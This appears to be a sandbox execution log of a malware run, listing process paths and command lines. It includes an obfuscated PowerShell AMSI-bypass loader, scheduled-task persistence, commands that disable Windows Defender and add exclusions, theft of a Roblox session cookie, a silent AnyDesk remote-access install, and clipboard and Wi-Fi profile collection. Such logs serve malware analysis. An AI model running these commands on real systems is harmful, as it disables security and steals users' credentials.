$_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+'o'+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+'i'+[Char](118)+'eMe'+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$aEqbJxljOyJREp=$DSNlAcZSPOCre.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fJvLoFUZaqRWJGgZvUy=XzSGgtVnuRCJ @([String])([IntPtr]);$ennhYWXsQxztiRumUHacEL=XzSGgtVnuRCJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aYbogmOhwbP=$DSNlAcZSPOCre.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$dpsghQeCUIXNWc=$aEqbJxljOyJREp.Invoke($Null,@([Object]$aYbogmOhwbP,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'Libr'+'a'+''+'r'+'y'+[Char](65)+'')));$dGhnJNhXlujxlKtab=$aEqbJxljOyJREp.Invoke($Null,@([Object]$aYbogmOhwbP,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$HEKbBJN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dpsghQeCUIXNWc,$fJvLoFUZaqRWJGgZvUy).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$DhDXmunwbzUgIUQQU=$aEqbJxljOyJREp.Invoke($Null,@([Object]$HEKbBJN,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+'nBu'+'f'+'f'+[Char](101)+'r')));$nBYmBOmmPJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGhnJNhXlujxlKtab,$ennhYWXsQxztiRumUHacEL).Invoke($DhDXmunwbzUgIUQQU,[uint32]8,4,[ref]$nBYmBOmmPJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DhDXmunwbzUgIUQQU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGhnJNhXlujxlKtab,$ennhYWXsQxztiRumUHacEL).Invoke($DhDXmunwbzUgIUQQU,[uint32]8,0x20,[ref]$nBYmBOmmPJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('r'+[Char](117)+''+[Char](116)+''+'s'+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c delete.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 408 -p 5772 -ip 5772

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5772 -s 1504

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"

C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"

C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe

"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"

C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe

"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe

"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1920 -ip 1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 1220

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4016 -s 384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\jy.exe

"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp" /SL5="$D0230,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 612 -p 4548 -ip 4548

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4548 -s 492

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\a\test30.exe

"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second

C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe

"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4388 -s 2248

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 6052 -s 700

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 588 -p 5516 -ip 5516

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 588 -p 4016 -ip 4016

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4016 -s 668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2976 -ip 2976

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 1272

C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6D572EB81CD218E5FBCEEECAD339B1B7

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"

C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe" --commit fullExeInstall

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe"

C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6848 -ip 6848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 76

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5604 -ip 5604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1160

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F0.tmp\1F1.tmp\1F2.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3DF0.tmp\3DF1.tmp\3DF2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

